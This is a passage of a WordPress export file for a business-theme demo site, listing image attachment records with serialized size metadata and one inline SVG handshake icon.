		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:29:"2020/09/project-slide-4.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:29:"project-slide-4-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"project-slide-4-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"project-slide-4-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-4-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-4-1-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/data-analytics/project-slide-5/</link>
		<pubDate>Fri, 11 Sep 2020 07:13:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>835</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:13:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:13:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>826</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:29:"2020/09/project-slide-5.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:29:"project-slide-5-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"project-slide-5-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"project-slide-5-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-5-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-5-1-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/project-3/</link>
		<pubDate>Fri, 11 Sep 2020 07:15:30 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>838</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:15:30]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:15:30]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>837</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:719;s:6:"height";i:719;s:4:"file";s:23:"2020/09/project-3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"project-3-1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"project-3-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"project-3-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"project-3-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project-3-1-719x600.jpg";s:5:"width";i:719;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/project-slide-3/</link>
		<pubDate>Fri, 11 Sep 2020 07:15:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>839</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:15:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:15:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>837</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:29:"2020/09/project-slide-3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:29:"project-slide-3-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"project-slide-3-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"project-slide-3-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-3-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-3-1-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/finance-strategy/project-slide-2/</link>
		<pubDate>Fri, 11 Sep 2020 07:18:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>844</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:18:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:18:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>842</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:29:"2020/09/project-slide-2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:29:"project-slide-2-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"project-slide-2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"project-slide-2-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-2-1-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>deal</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/services-with-icon/deal/</link>
		<pubDate>Fri, 11 Sep 2020 10:22:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/deal.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>887</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 10:22:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 10:22:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[deal]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>885</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/deal.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/deal.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M509.07,194.061L414.3,99.29c-3.906-3.905-10.24-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l87.697,87.696    l-51.274,51.273c-1.571,1.57-4.126,1.57-5.695,0l-101.25-101.249c-1.571-1.57-1.571-4.125,0-5.696l34.411-34.413    c3.906-3.906,3.906-10.24,0-14.147c-3.907-3.906-10.239-3.906-14.148,0l-34.411,34.411c-7.128,7.129-8.818,17.655-5.1,26.412    l-11.638,11.638h-44.877h-3.537h-32.955l-14.682-14.682c0.564-2.058,0.862-4.201,0.862-6.392c0-6.42-2.501-12.456-7.04-16.995    l-33.481-33.481c-3.907-3.906-10.239-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l33.482,33.481    c1.026,1.026,1.18,2.225,1.18,2.847s-0.153,1.821-1.181,2.848l-2.786,2.786l-98.495,98.471c-0.032,0.032-0.059,0.067-0.09,0.099    c-0.998,0.923-2.128,1.073-2.727,1.073c-0.623,0-1.822-0.153-2.848-1.179L24.15,201.114l88.876-88.875    c3.906-3.906,3.906-10.24,0-14.147s-10.238-3.906-14.148,0L2.93,194.041c-3.906,3.906-3.906,10.24,0,14.147l58.346,58.347    c4.687,4.686,10.841,7.028,16.995,7.028c2.826,0,5.646-0.518,8.329-1.507l32.843,32.843c-2.55,4.784-4,10.237-4,16.025    c0,18.853,15.338,34.191,34.191,34.191c0.042,0,0.084-0.003,0.126-0.003c0,0.002,0,0.004,0,0.006    c0,18.811,15.269,34.119,34.064,34.188c0,0.015-0.001,0.029-0.001,0.044c0,18.853,15.338,34.191,34.191,34.191    c5.8,0,11.265-1.456,16.055-4.015l12.227,12.227c5.732,5.732,13.354,8.889,21.46,8.889c8.107,0,15.729-3.157,21.46-8.889    c5.427-5.427,8.546-12.548,8.862-20.171c7.393-0.368,14.678-3.368,20.311-9.002c5.952-5.952,9.166-13.866,9.051-22.282    c0-0.018-0.001-0.035-0.001-0.053c8.703-0.54,16.71-4.354,22.63-10.805c5.951-6.482,8.896-14.656,8.87-22.81    c8.37-0.241,16.201-3.613,22.146-9.559c6.202-6.201,9.603-14.447,9.573-23.218c-0.017-5.164-1.229-10.132-3.49-14.608l32.81-30    c4.115,2.876,8.927,4.335,13.749,4.335c6.154,0,12.309-2.343,16.995-7.027l58.346-58.347    C512.976,204.301,512.976,197.967,509.07,194.061z M149.635,335.11c-7.822,0-14.185-6.363-14.185-14.185    c0-7.821,6.363-14.184,14.185-14.184c7.822,0,14.185,6.363,14.185,14.184C163.819,328.747,157.456,335.11,149.635,335.11z     M194.516,364.551c-0.407,0.386-0.804,0.781-1.192,1.186c-2.503,2.212-5.779,3.567-9.373,3.567    c-7.821,0-14.184-6.363-14.184-14.185s6.362-14.185,14.184-14.185s14.185,6.363,14.185,14.185    C198.135,358.743,196.758,362.042,194.516,364.551z M228.18,399.225c-0.046,0.044-0.095,0.082-0.14,0.127    c-0.05,0.05-0.091,0.104-0.139,0.154c-2.557,2.491-6.043,4.032-9.885,4.032c-7.823-0.002-14.186-6.365-14.186-14.186    c0-3.623,1.376-6.922,3.619-9.431c0.407-0.386,0.804-0.781,1.192-1.186c2.502-2.212,5.779-3.566,9.373-3.566    c7.821,0,14.185,6.363,14.185,14.185C232.199,393.19,230.663,396.669,228.18,399.225z M366.94,322.927    c-2.395,2.394-5.577,3.712-8.963,3.712s-6.568-1.318-8.963-3.711l-20.782-20.783c-3.906-3.906-10.238-3.906-14.148,0    c-3.906,3.906-3.906,10.24,0,14.147l20.781,20.782c0.001,0,0.002,0.001,0.002,0.001l0.063,0.063    c5.157,5.156,5.333,13.402,0.401,18.774c-2.478,2.7-5.859,4.257-9.522,4.385c-3.655,0.135-7.145-1.188-9.805-3.707l-20.011-18.942    c-4.013-3.798-10.344-3.625-14.142,0.388c-3.798,4.012-3.625,10.343,0.387,14.142l21.787,20.625    c2.157,2.042,3.367,4.802,3.408,7.772c0.041,2.97-1.093,5.762-3.193,7.862c-4.251,4.253-11.173,4.252-15.424,0l-10.101-10.101    c-3.907-3.906-10.239-3.906-14.148,0c-1.953,1.954-2.93,4.513-2.93,7.073s0.977,5.121,2.93,7.073l10.5,10.5    c1.954,1.954,3.03,4.551,3.03,7.313s-1.076,5.36-3.03,7.313c-1.954,1.954-4.551,3.029-7.313,3.029    c-2.763,0-5.359-1.076-7.313-3.03l-12.235-12.235c2.548-4.782,3.997-10.233,3.997-16.019c0-18.811-15.27-34.119-34.065-34.188    c0-0.015,0.001-0.029,0.001-0.044c0-18.853-15.338-34.191-34.191-34.191c-0.042,0-0.083,0.003-0.125,0.003    c0-0.002,0-0.004,0-0.006c0-18.853-15.338-34.19-34.191-34.19c-5.798,0-11.261,1.455-16.049,4.012l-31.265-31.264l88.44-88.441    l15.399,15.4c1.877,1.876,4.421,2.93,7.073,2.93h12.948l-39.486,39.486c-6.037,6.037-9.361,14.065-9.361,22.603    c0,8.538,3.324,16.565,9.361,22.602c6.037,6.038,14.065,9.362,22.603,9.362s16.566-3.325,22.603-9.362l33.491-33.492l36.665,0.402    l64.825,63.967c2.422,2.39,3.762,5.58,3.772,8.982C370.665,317.322,369.346,320.52,366.94,322.927z M374.169,284.024    l-60.938-60.131c-0.001-0.001-0.002-0.002-0.003-0.003l-0.088-0.087c-2.25-2.221-5.287-3.151-8.201-2.808l-43.539-0.477    c-2.7-0.02-5.28,1.027-7.183,2.929l-36.467,36.468c-2.259,2.259-5.262,3.502-8.455,3.502s-6.196-1.243-8.455-3.502    c-2.259-2.258-3.502-5.261-3.502-8.455c0-3.194,1.243-6.197,3.502-8.456l53.633-53.633h48.416c2.653,0,5.197-1.054,7.073-2.93    l13.328-13.328l82.237,82.237L374.169,284.024z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="438.336" cy="205.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="72.644" cy="206.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="131.064" cy="82.139" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="380.757" cy="81.338" r="9.983"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-detail</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/marketing-research/bg1-service-detail/</link>
		<pubDate>Wed, 16 Sep 2020 10:07:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-detail.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>935</wp:post_id>
		<wp:post_date><![CDATA[2020-09-16 10:07:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-16 10:07:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-detail]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>898</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-detail.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-detail.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:204;s:4:"file";s:32:"2020/09/bg1-service-detail.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:31:"bg1-service-detail-1-300x70.jpg";s:5:"width";i:300;s:6:"height";i:70;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"bg1-service-detail-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"bg1-service-detail-1-768x180.jpg";s:5:"width";i:768;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:32:"bg1-service-detail-1-600x204.jpg";s:5:"width";i:600;s:6:"height";i:204;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:32:"bg1-service-detail-1-600x204.jpg";s:5:"width";i:600;s:6:"height";i:204;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-detail2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/organizational-audit/bg1-service-detail2/</link>
		<pubDate>Thu, 17 Sep 2020 04:10:20 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-detail2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>961</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 04:10:20]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 04:10:20]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-detail2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>959</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-detail2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-detail2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1174;s:6:"height";i:540;s:4:"file";s:33:"2020/09/bg1-service-detail2.jpg";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:33:"bg1-service-detail2-1-300x138.jpg";s:5:"width";i:300;s:6:"height";i:138;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"bg1-service-detail2-1-1024x471.jpg";s:5:"width";i:1024;s:6:"height";i:471;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:33:"bg1-service-detail2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"bg1-service-detail2-1-768x353.jpg";s:5:"width";i:768;s:6:"height";i:353;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:33:"bg1-service-detail2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:33:"bg1-service-detail2-1-600x540.jpg";s:5:"width";i:600;s:6:"height";i:540;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-service-detail2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/organizational-audit/bg2-service-detail2/</link>
		<pubDate>Thu, 17 Sep 2020 07:35:50 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-service-detail2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>970</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 07:35:50]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 07:35:50]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-service-detail2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>959</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
